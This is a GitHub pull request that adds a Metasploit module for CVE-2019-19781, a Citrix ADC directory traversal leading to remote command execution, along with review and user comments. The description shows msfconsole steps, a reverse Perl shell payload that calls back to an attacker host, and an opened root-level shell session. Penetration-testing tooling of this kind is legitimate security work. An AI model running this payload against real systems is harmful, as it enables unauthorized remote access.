Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

add citrix path traversal exploit #12816

Merged
merged 21 commits into from Jan 14, 2020

Conversation

@mekhalleh
Copy link
Contributor

mekhalleh commented Jan 12, 2020

An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Execute the following commands
msf5 exploit(unix/webapp/citrix_dir_trasversal_rce) > use exploit/unix/webapp/citrix_dir_trasversal_rce
msf5 exploit(unix/webapp/citrix_dir_trasversal_rce) > set rhost [IP]
rhost => XXX.XXX.XXX.XXX
msf5 exploit(unix/webapp/citrix_dir_trasversal_rce) > set lhost [IP]
lhost => XXX.XXX.XXX.XXX
msf5 exploit(unix/webapp/citrix_dir_trasversal_rce) > set verbose true
verbose => true
msf5 exploit(unix/webapp/citrix_dir_trasversal_rce) > run

[*] Started reverse TCP handler on 0.0.0.0:XXXXX 
[+] The target appears to be vulnerable.
[*] Sending cmd/unix/reverse_perl command payload
[*] Generated command payload: perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"XXX.XXX.XXX.XXX:XXXXX");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
[*] Bookmark Added.
[*] Command shell session 1 opened (XXX.XXX.XXX.XXX:XXXXX -> XXX.XXX.XXX.XXX:XXXXX) at XXXX-XX-XX XX:XX:XX +0400

uname -a
FreeBSD xxxxxxxxxxxxxxx 8.4-NETSCALER-13.0 FreeBSD 8.4-NETSCALER-13.0 #0: Fri Oct 11 07:24:57 PDT 2019     root@xxx-xxxxx-xxx:/usr/obj/home/build/rs_130_41_9_RTM/usr.src/sys/NS64  amd64
mekhalleh added 2 commits Jan 12, 2020
@wvu-r7 wvu-r7 self-assigned this Jan 12, 2020
mekhalleh added 2 commits Jan 12, 2020
@space-r7 space-r7 added the needs-docs label Jan 13, 2020
@space-r7 space-r7 removed the needs-docs label Jan 13, 2020
@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Jan 13, 2020

Hi! Thanks for this. We'll be making some final changes to the module and landing with #12813 as the exploit's check method if possible. I'll let you know when I'm ready to merge this. Thanks!

@wvu-r7 wvu-r7 changed the title add citrix path trasversal exploit add citrix path traversal exploit Jan 14, 2020
Bad habit!
@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Jan 14, 2020

I forgot about this, sorry:

'HttpClientTimeout' => 5 # This seems sane, but it's not a float

res = send_request_raw(
'method' => 'GET',
'uri' => dir_traversal(path),
'partial' => true # Allow partial response due to timeout
)

I'll add a decent default.

wvu-r7 added 2 commits Jan 14, 2020
Totally forgot I did this for Pulse Secure.
Just the comment.
wvu-r7 added a commit that referenced this pull request Jan 14, 2020
@wvu-r7 wvu-r7 merged commit 72d06b0 into rapid7:master Jan 14, 2020
1 of 3 checks passed
1 of 3 checks passed
Metasploit Automation - Sanity Test Execution Build triggered for merge commit.
Details
continuous-integration/travis-ci/pr The Travis CI build is in progress
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Jan 14, 2020

Release Notes

This adds an exploit for CVE-2019-19781, a directory traversal vulnerability in Citrix ADC (NetScaler) that can be leveraged to execute an arbitrary command payload.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Jan 14, 2020

@mekhalleh: The exploit has landed. Please review the commits I've added. I hope the changes are positive, and I apologize that I gave you such short notice on this. Thank you!

@jmartin-r7

This comment has been minimized.

Copy link
Member

jmartin-r7 commented Jan 14, 2020

This takes advantage of #12517 & #12737 marking msf5.

@secprentice

This comment has been minimized.

Copy link

secprentice commented Jan 20, 2020

I am trying to use this exploit but cmd/unix/reverse_perl isnt working with the exploit nor does it come default with the exploit. Is this expected?

msf5 exploit(unix/webapp/citrix_access_gateway_exec) > use exploit/unix/webapp/citrix_dir_trasversal_rce

msf5 exploit(unix/webapp/citrix_access_gateway_exec) > set payload cmd/unix/reverse_per
[-] The value specified for payload is not valid.

I can however use cmd/unix/reverse_perl on its own?

msf5 payload(cmd/unix/reverse_perl) > use cmd/unix/reverse_perl

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Jan 21, 2020

That is an entirely different module.

@secprentice

This comment has been minimized.

Copy link

secprentice commented Jan 21, 2020

I must be missing something deathly obvious. Thanks for getting back to me, I will try some more to see what I am missing.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Jan 21, 2020

The one you want is exploit/linux/http/citrix_dir_traversal_rce. Hope this helps!

@secprentice

This comment has been minimized.

Copy link

secprentice commented Jan 21, 2020

That helps a lot. A definite misunderstanding on my part. Thank you for the great module.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
6 participants
You can’t perform that action at this time.